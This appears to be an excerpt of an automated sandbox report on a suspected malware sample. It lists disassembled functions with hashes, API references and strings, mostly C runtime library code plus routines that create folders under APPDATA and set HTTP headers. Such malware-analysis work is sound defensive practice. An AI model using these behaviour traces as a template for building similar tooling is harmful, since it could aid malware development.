Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 293818218bedeef1481949536c6cc3e7b8a6b3c3ef9f58d5a142aa209fb16be8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 8801A276A006148FDF21EF24CC04BAA33F5EFC6216F4548F5EA0A9B281E774B9459B90

Function 0041366F Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4

Function 04B538D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: 246488dfe49aa5c32b350fed1d045568dcfc0a17c0cb868f336d2f696df64edd
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: 39E08C72911268EBCB25DB8CC945E8AF3FCEB44B80B114496BD01D3220C270EE00C7D0

Function 04D02A6F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: b4ae77fc90a4fa150eaddbe439427d48a112bff6acf9a5ab564842d58761aa4e
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: 89E08C32A12238EBCB24DB9DC908A8AF3ECEB45B04B118496B501D3140C6B0EE01C7E0

Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2

Function 04CFE30D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
Instruction ID: 23e5f59e324a4176bb4cb1d0277f51050953cdf21f1838d274749ce008d5f8ee
Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
Instruction Fuzzy Hash: 53E04631400108BFCB117F14DC4CA8A3B2AEB00241B108424FA0986131CB39EE82CA54

Function 00409088 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F

Strings

SleepConditionVariableCS, xrefs: 004090BC
WakeAllConditionVariable, xrefs: 004090C8
kernel32.dll, xrefs: 004090AB
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D

Function 004171E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00417227

Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8

_free.LIBCMT ref: 0041721C

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 0041723E
_free.LIBCMT ref: 00417253
_free.LIBCMT ref: 0041725E
_free.LIBCMT ref: 00417280
_free.LIBCMT ref: 00417293
_free.LIBCMT ref: 004172A1
_free.LIBCMT ref: 004172AC
_free.LIBCMT ref: 004172E4
_free.LIBCMT ref: 004172EB
_free.LIBCMT ref: 00417308
_free.LIBCMT ref: 00417320

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628

Function 04B5744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 04B5748E

Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57167
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57179
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5718B
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5719D
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571AF
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571C1
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571D3
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571E5
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B571F7
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B57209
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5721B
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5722D
Part of subcall function 04B5714A: _free.LIBCMT ref: 04B5723F

_free.LIBCMT ref: 04B57483

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B574A5
_free.LIBCMT ref: 04B574BA
_free.LIBCMT ref: 04B574C5
_free.LIBCMT ref: 04B574E7
_free.LIBCMT ref: 04B574FA
_free.LIBCMT ref: 04B57508
_free.LIBCMT ref: 04B57513
_free.LIBCMT ref: 04B5754B
_free.LIBCMT ref: 04B57552
_free.LIBCMT ref: 04B5756F
_free.LIBCMT ref: 04B57587

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction ID: 14cb6ab2ab1a9437f4c82fe233bb491e545522ac7e1cbfa12bd6e5481a9237c1
Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction Fuzzy Hash: 95316B31B00605AFEB25AE3DE844B5AF7E8EF00354F50489AE869D71B0DF74F8409B20

Function 04D065E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D0661C
___free_lconv_mon.LIBCMT ref: 04D06627

Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06300
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06312
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06324
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06336
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06348
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D0635A
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D0636C
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D0637E
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D06390
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063A2
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063B4
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063C6
Part of subcall function 04D062E3: _free.LIBCMT ref: 04D063D8

_free.LIBCMT ref: 04D0663E
_free.LIBCMT ref: 04D06653
_free.LIBCMT ref: 04D0665E
_free.LIBCMT ref: 04D06680
_free.LIBCMT ref: 04D06693
_free.LIBCMT ref: 04D066A1
_free.LIBCMT ref: 04D066AC
_free.LIBCMT ref: 04D066E4
_free.LIBCMT ref: 04D066EB
_free.LIBCMT ref: 04D06708
_free.LIBCMT ref: 04D06720

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction ID: 5df4256883318a2fe2d83c5e8559d2c5407becca14d74e488c561f6fdef36783
Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction Fuzzy Hash: 2D313731700601ABEB22AF39E844B5A77E9FF00314F54C86AE159E71D1DE76F8A18B20

Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 1000A045

Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515

_free.LIBCMT ref: 1000A03A

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 1000A05C
_free.LIBCMT ref: 1000A071
_free.LIBCMT ref: 1000A07C
_free.LIBCMT ref: 1000A09E
_free.LIBCMT ref: 1000A0B1
_free.LIBCMT ref: 1000A0BF
_free.LIBCMT ref: 1000A0CA
_free.LIBCMT ref: 1000A102
_free.LIBCMT ref: 1000A109
_free.LIBCMT ref: 1000A126
_free.LIBCMT ref: 1000A13E

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761

Function 0040B0DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
___TypeMatch.LIBVCRUNTIME ref: 0040B309
IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
_UnwindNestedFrames.LIBCMT ref: 0040B45F
CallUnexpected.LIBVCRUNTIME ref: 0040B47A

Strings

csm, xrefs: 0040B185
csm, xrefs: 0040B118
csm, xrefs: 0040B231

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA

Function 04B4B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B43F
type_info::operator==.LIBVCRUNTIME ref: 04B4B461
___TypeMatch.LIBVCRUNTIME ref: 04B4B570
IsInExceptionSpec.LIBVCRUNTIME ref: 04B4B642
_UnwindNestedFrames.LIBCMT ref: 04B4B6C6
CallUnexpected.LIBVCRUNTIME ref: 04B4B6E1

Strings

csm, xrefs: 04B4B498
csm, xrefs: 04B4B3EC
csm, xrefs: 04B4B37F

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: f958f8c1c06dd8ad2a3a2dda83ddbe627588a88ea3576b8e757bd005fb919053
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: 45B16C71C04209EFDF15DFA8C8809AEB7B5FF88314B14459AEA156B211D730FA51EFA1

Function 04CFA4DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 04CFA5D8
type_info::operator==.LIBVCRUNTIME ref: 04CFA5FA
___TypeMatch.LIBVCRUNTIME ref: 04CFA709
IsInExceptionSpec.LIBVCRUNTIME ref: 04CFA7DB
_UnwindNestedFrames.LIBCMT ref: 04CFA85F
CallUnexpected.LIBVCRUNTIME ref: 04CFA87A

Strings

csm, xrefs: 04CFA518
csm, xrefs: 04CFA631
csm, xrefs: 04CFA585

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: 1d886f11738a973bc4963baa765cc618aaf29c975ace3e3ce197e2408c4094cc
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: 33B1AD71800209DFDF59DF94CC809AEFBB6BF04314B11805AEA196B211D37AFA11DF91

Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10001CE7
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2

Strings

TMPDIR, xrefs: 10001E24
APPDATA, xrefs: 10001D3F

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
String ID: APPDATA$TMPDIR
API String ID: 1838500112-4048745339
Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61

Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100010CE
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163

Strings

Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: HeadersHttpRequest$H_prolog3_
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1254599795-787135837
Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1

Function 004110E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004110FB

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 00411107
_free.LIBCMT ref: 00411112
_free.LIBCMT ref: 0041111D
_free.LIBCMT ref: 00411128
_free.LIBCMT ref: 00411133
_free.LIBCMT ref: 0041113E
_free.LIBCMT ref: 00411149
_free.LIBCMT ref: 00411154
_free.LIBCMT ref: 00411162

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84

Function 04B5134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04B51362

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B5136E
_free.LIBCMT ref: 04B51379
_free.LIBCMT ref: 04B51384
_free.LIBCMT ref: 04B5138F
_free.LIBCMT ref: 04B5139A
_free.LIBCMT ref: 04B513A5
_free.LIBCMT ref: 04B513B0
_free.LIBCMT ref: 04B513BB
_free.LIBCMT ref: 04B513C9

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction ID: 2a10a7805f43cdd66fb67693c0c57ce734796f275dd78e4ecda33884c6c57685
Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction Fuzzy Hash: A821B87A90011CFFDB05EF99D880EDDBFB8BF08244B4051A6E9259B171DB31EA54DB80

Function 04D004E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D004FB
_free.LIBCMT ref: 04D00507
_free.LIBCMT ref: 04D00512
_free.LIBCMT ref: 04D0051D
_free.LIBCMT ref: 04D00528
_free.LIBCMT ref: 04D00533
_free.LIBCMT ref: 04D0053E
_free.LIBCMT ref: 04D00549
_free.LIBCMT ref: 04D00554
_free.LIBCMT ref: 04D00562

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
